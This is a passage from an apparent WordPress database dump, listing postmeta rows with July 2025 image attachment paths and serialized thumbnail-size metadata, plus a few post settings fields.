:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1927,604,'_wp_attached_file','2025/07/518069309_122237076422202781_5168176646363493549_n.jpg'),
(1928,604,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1309;s:6:\"height\";i:862;s:4:\"file\";s:62:\"2025/07/518069309_122237076422202781_5168176646363493549_n.jpg\";s:8:\"filesize\";i:166743;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"518069309_122237076422202781_5168176646363493549_n-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18722;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"518069309_122237076422202781_5168176646363493549_n-1024x674.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:674;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119251;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"518069309_122237076422202781_5168176646363493549_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8523;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"518069309_122237076422202781_5168176646363493549_n-768x506.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:506;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78539;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"518069309_122237076422202781_5168176646363493549_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20203;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1929,605,'_wp_attached_file','2025/07/517408980_122237076290202781_2399483217391122872_n-1.jpg'),
(1930,605,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:64:\"2025/07/517408980_122237076290202781_2399483217391122872_n-1.jpg\";s:8:\"filesize\";i:535489;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"517408980_122237076290202781_2399483217391122872_n-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26202;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"517408980_122237076290202781_2399483217391122872_n-1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194476;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"517408980_122237076290202781_2399483217391122872_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10804;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"517408980_122237076290202781_2399483217391122872_n-1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212370;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"517408980_122237076290202781_2399483217391122872_n-1-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:349848;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"517408980_122237076290202781_2399483217391122872_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25376;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1931,606,'_wp_attached_file','2025/07/518245601_122237076614202781_1845369519904074883_n.jpg'),
(1932,606,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1169;s:6:\"height\";i:878;s:4:\"file\";s:62:\"2025/07/518245601_122237076614202781_1845369519904074883_n.jpg\";s:8:\"filesize\";i:174862;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"518245601_122237076614202781_1845369519904074883_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20455;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"518245601_122237076614202781_1845369519904074883_n-1024x769.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:769;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139435;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"518245601_122237076614202781_1845369519904074883_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8390;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"518245601_122237076614202781_1845369519904074883_n-768x577.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90736;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"518245601_122237076614202781_1845369519904074883_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18219;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1935,598,'_edit_last','1'),
(1936,598,'title_style','default'),
(1937,598,'_title_style','field_5d1a0217cf408'),
(1938,598,'related',''),
(1939,598,'_related','field_603b51c3e183e'),
(1940,607,'title_style','default'),
(1941,607,'_title_style','field_5d1a0217cf408'),
(1942,607,'related',''),
(1943,607,'_related','field_603b51c3e183e'),
(1946,598,'_thumbnail_id','605'),
(1961,608,'_edit_lock','1752463335:1'),
(1962,609,'_wp_attached_file','2025/07/516289857_122237171936202781_5799836714853409682_n.jpg'),
(1963,609,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:938;s:4:\"file\";s:62:\"2025/07/516289857_122237171936202781_5799836714853409682_n.jpg\";s:8:\"filesize\";i:286375;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"516289857_122237171936202781_5799836714853409682_n-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24077;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"516289857_122237171936202781_5799836714853409682_n-1024x651.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:651;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:171433;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"516289857_122237171936202781_5799836714853409682_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10689;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"516289857_122237171936202781_5799836714853409682_n-768x488.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110913;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"516289857_122237171936202781_5799836714853409682_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26176;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1964,610,'_wp_attached_file','2025/07/516707833_122237172494202781_5110237434292793109_n.jpg'),
(1965,610,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:936;s:4:\"file\";s:62:\"2025/07/516707833_122237172494202781_5110237434292793109_n.jpg\";s:8:\"filesize\";i:208047;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"516707833_122237172494202781_5110237434292793109_n-300x190.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17963;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"516707833_122237172494202781_5110237434292793109_n-1024x649.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:649;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119238;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"516707833_122237172494202781_5110237434292793109_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8097;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"516707833_122237172494202781_5110237434292793109_n-768x487.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:487;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76971;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"516707833_122237172494202781_5110237434292793109_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20628;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1966,611,'_wp_attached_file','2025/07/517389779_122237171462202781_5813847145994819837_n.jpg'),
(1967,611,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1125;s:6:\"height\";i:1590;s:4:\"file\";s:62:\"2025/07/517389779_122237171462202781_5813847145994819837_n.jpg\";s:8:\"filesize\";i:296689;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517389779_122237171462202781_5813847145994819837_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23175;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517389779_122237171462202781_5813847145994819837_n-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:178967;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517389779_122237171462202781_5813847145994819837_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9971;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"517389779_122237171462202781_5813847145994819837_n-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194432;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"517389779_122237171462202781_5813847145994819837_n-1087x1536.jpg\";s:5:\"width\";i:1087;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:331921;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517389779_122237171462202781_5813847145994819837_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22337;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1968,612,'_wp_attached_file','2025/07/517626805_122237172002202781_7210279086706739749_n.jpg'),
(1969,612,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:62:\"2025/07/517626805_122237172002202781_7210279086706739749_n.jpg\";s:8:\"filesize\";i:327649;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517626805_122237172002202781_7210279086706739749_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24991;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517626805_122237172002202781_7210279086706739749_n-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:181943;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517626805_122237172002202781_7210279086706739749_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9748;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"517626805_122237172002202781_7210279086706739749_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115512;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517626805_122237172002202781_7210279086706739749_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24482;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1970,613,'_wp_attached_file','2025/07/517361697_122237172020202781_5575056635419967051_n.jpg'),
(1971,613,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1068;s:4:\"file\";s:62:\"2025/07/517361697_122237172020202781_5575056635419967051_n.jpg\";s:8:\"filesize\";i:356518;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517361697_122237172020202781_5575056635419967051_n-300x217.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24490;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517361697_122237172020202781_5575056635419967051_n-1024x740.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:740;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197420;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517361697_122237172020202781_5575056635419967051_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9672;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"517361697_122237172020202781_5575056635419967051_n-768x555.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:555;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123776;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517361697_122237172020202781_5575056635419967051_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24904;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1972,614,'_wp_attached_file','2025/07/517586179_122237172362202781_1752837972981663464_n.jpg'),
(1973,614,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:957;s:4:\"file\";s:62:\"2025/07/517586179_122237172362202781_1752837972981663464_n.jpg\";s:8:\"filesize\";i:222454;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517586179_122237172362202781_1752837972981663464_n-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17270;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517586179_122237172362202781_1752837972981663464_n-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127192;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517586179_122237172362202781_1752837972981663464_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8072;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"517586179_122237172362202781_1752837972981663464_n-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81291;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517586179_122237172362202781_1752837972981663464_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18252;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1974,615,'_wp_attached_file','2025/07/517714638_122237172428202781_7045340807892275563_n.jpg'),
(1975,615,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1466;s:6:\"height\";i:987;s:4:\"file\";s:62:\"2025/07/517714638_122237172428202781_7045340807892275563_n.jpg\";s:8:\"filesize\";i:219126;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517714638_122237172428202781_7045340807892275563_n-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19737;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517714638_122237172428202781_7045340807892275563_n-1024x689.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:689;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129559;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517714638_122237172428202781_7045340807892275563_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9000;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"517714638_122237172428202781_7045340807892275563_n-768x517.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:517;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84351;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517714638_122237172428202781_7045340807892275563_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20569;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1976,616,'_wp_attached_file','2025/07/517982122_122237171852202781_2511850332074169787_n.jpg'),
(1977,616,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:1029;s:4:\"file\";s:62:\"2025/07/517982122_122237171852202781_2511850332074169787_n.jpg\";s:8:\"filesize\";i:260094;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517982122_122237171852202781_2511850332074169787_n-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20551;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517982122_122237171852202781_2511850332074169787_n-1024x714.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:714;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150190;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517982122_122237171852202781_2511850332074169787_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9229;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"517982122_122237171852202781_2511850332074169787_n-768x535.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:535;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95663;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517982122_122237171852202781_2511850332074169787_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20416;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1978,617,'_wp_attached_file','2025/07/518078323_122237172146202781_3649213011814674172_n.jpg'),
(1979,617,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1394;s:6:\"height\";i:924;s:4:\"file\";s:62:\"2025/07/518078323_122237172146202781_3649213011814674172_n.jpg\";s:8:\"filesize\";i:239002;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"518078323_122237172146202781_3649213011814674172_n-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19884;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"518078323_122237172146202781_3649213011814674172_n-1024x679.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:679;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149848;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"518078323_122237172146202781_3649213011814674172_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8755;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"518078323_122237172146202781_3649213011814674172_n-768x509.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95703;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"518078323_122237172146202781_3649213011814674172_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21982;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1980,618,'_wp_attached_file','2025/07/518049760_122237172158202781_6302015373935658322_n.jpg'),
(1981,618,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1141;s:6:\"height\";i:1087;s:4:\"file\";s:62:\"2025/07/518049760_122237172158202781_6302015373935658322_n.jpg\";s:8:\"filesize\";i:241290;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"518049760_122237172158202781_6302015373935658322_n-300x286.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28279;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"518049760_122237172158202781_6302015373935658322_n-1024x976.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:976;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:202661;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"518049760_122237172158202781_6302015373935658322_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9381;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"518049760_122237172158202781_6302015373935658322_n-768x732.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:732;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131704;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"518049760_122237172158202781_6302015373935658322_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19807;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1982,619,'_wp_attached_file','2025/07/518152399_122237171924202781_7608270207764390845_n.jpg'),
